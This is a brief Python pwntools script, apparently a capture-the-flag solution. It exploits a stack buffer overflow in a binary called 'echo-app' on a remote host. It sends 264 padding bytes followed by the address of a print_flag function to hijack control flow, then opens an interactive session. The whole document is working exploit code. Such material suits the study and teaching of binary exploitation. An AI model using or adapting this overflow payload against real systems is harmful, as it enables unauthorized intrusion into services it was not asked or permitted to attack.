#!/usr/bin/python3

from pwn import *

context.binary = target = ELF("./echo-app", checksec=False)
# r = process()
r = remote("54.85.45.101", 8008)

# funcs
s = lambda a: r.sendline(a)

# buf
buf = b"A"*264
buf += p64(target.sym.print_flag)
s(buf)

r.interactive()